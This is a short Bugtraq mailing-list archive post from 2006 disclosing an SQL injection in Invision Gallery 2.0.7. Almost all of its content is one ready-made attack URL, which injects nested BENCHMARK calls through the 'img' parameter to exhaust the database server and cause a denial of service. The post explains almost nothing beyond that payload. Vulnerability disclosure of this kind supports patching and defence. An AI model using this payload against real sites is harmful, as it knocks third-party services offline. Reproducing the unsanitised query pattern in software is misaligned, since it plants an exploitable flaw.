Home page logo
/

bugtraq logo Bugtraq mailing list archives

Invision Gallery 2.0.7 SQL Injection Vulnerability
From: infection () mail kz
Date: 1 Dec 2006 10:22:51 -0000

Invision Gallery 2.0.7 

DOS attak can be performed

index.php?automodule=gallery&cmd=postcomment&op=doaddcomment&Post=test&img=111 OR id IN (SELECT 
BENCHMARK(10000000,BENCHMARK(10000000,md5(current_date))) FROM ipb_gallery_images )


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]